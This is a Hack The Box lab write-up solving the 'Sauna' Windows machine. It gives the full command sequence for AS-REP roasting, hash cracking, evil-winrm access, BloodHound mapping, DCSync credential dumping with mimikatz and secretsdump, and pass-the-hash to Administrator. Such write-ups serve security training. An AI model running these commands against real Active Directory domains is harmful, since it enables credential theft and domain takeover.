Today we are going to solve a HTB machine named Sauna. Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation.

The credit for making this lab goes to egotisticalSW.

Level: Easy

Penetration Testing Methodology

Recon

• Nmap

Enumeration

• Web application
• username-anarchy

Exploitation (Initial Access)

• AS-REP Roasting
• john the ripper
• evil-winrm

Privilege Escalation

• winPEASx64
• bloodhound-python
• DCSync
• mimkatz
• impacket-secretsdump
• Pass The Hash
• Capture the Flag

Walkthrough

Recon

Starting the enumeration with port and service scan by running nmap.

nmap -sV 10.129.128.245

Nmap results suggests the Domain name as EGOTISTICAL-BANK.LOCAL

Enumeration

At port 80, there is a website running in which there is an About Us page containing the list of team members.

To create a list of users from the About Us page, someone used the username-anarchy tool, which you can download from:

Before starting any exploitation, performing the host entry in the /etc/hosts file for the target machine IP.

Exploitation

During the enumeration, we observed that the port 88 i.e., Kerberos service port is open. This article can be used to perform the attacks related to port 88 : https://viperone.gitbook.io/pentest-everything/everything/ports/port-88-or-kerberos

So, the AS-REP roasting can be tried here.

AS-REP roasting is a technique that allows retrieving password hashes of users that have Do not require Kerberos preauthentication property selected.

Since we already have a list of users and the Kerberos service enabled, we will use the impacket-GetNPUsers script inside kali that will allow us to capture the users’ hashes.

It can be seen that fsmith user’s hash is obtained after successful AS-REP roasting attack.

impacket-GetNPUsers -dc-ip 10.129.128.245 EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt

Copying the obtained hash into a file named hashes.

Cracking the above obtained hash using john the ripper tool.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

It can be seen that the password for the fsmith user is Thestrokes23.

Initial Access

The initial access can be taken by login into the target system using evil-winrm.

evil-winrm -I 10.129.128.245 -u fsmith -p Thestrokes23

Privilege Escalation

To perform privilege escalation, the attacker transfers winPEASx64.exe into the target system using the upload command through evil-winrm.

Running the winPEASx64.exe after someone transfers it.

Winpeas output showed a set of credentials for the domain user svc_loanmanager as Moneymakestheworldgoround!.

After logging in using the svc_loanmanager user, we observed that there was a local user by the name svc_loanmgr. So we tried using the same password for the svc_loanmgr user, and it worked. Now, to further enumerate, we can use Bloodhound to map the Active Directory rights and permissions.

We can take an overview of the Active Directory structure using the bloodhound-python script. The following command will generate the .json files, which we can later import into the Bloodhound (neo4j database) to analyze the results.

bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.129.128.245 -d EGOTISTICAL-BANK.LOCAL -c All

Starting the neo4j as console application,

Running the bloodhound and importing all the .json files.

Since, the svc_loanmgr user has DCSync Rights on the Domain Controller, allowing them to perform a DCSync attack and request any user credentials from the domain.

You can dump the credentials using mimikatz.exe or the impacket-secretsdump script. Here we will use both methods, first starting with mimikatz.exe.

After you transfer mimikatz.exe, run the following command:

./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"

Then, you can use the above command to dump the NTLM hash of the Administrator user.

You can obtain a similar NTLM hash using the impacket-secretsdump script.

The following command can be used to dump the hash:

impacket-secretsdump egotistical-bank/svc_loanmgr@10.129.128.245 -just-dc-user Administrator

Finally, an attacker can use the obtained hash to login into the target system as Administrator using Pass the Hash attack.

Therefore, an attacker can use evil-winrm to perform the attack and login into the target system as Administrator.

If you want to read more HTB Write-ups. Follow this Link.

Author: Vinayak Chauhan is an InfoSec researcher and Security Consultant. Contact here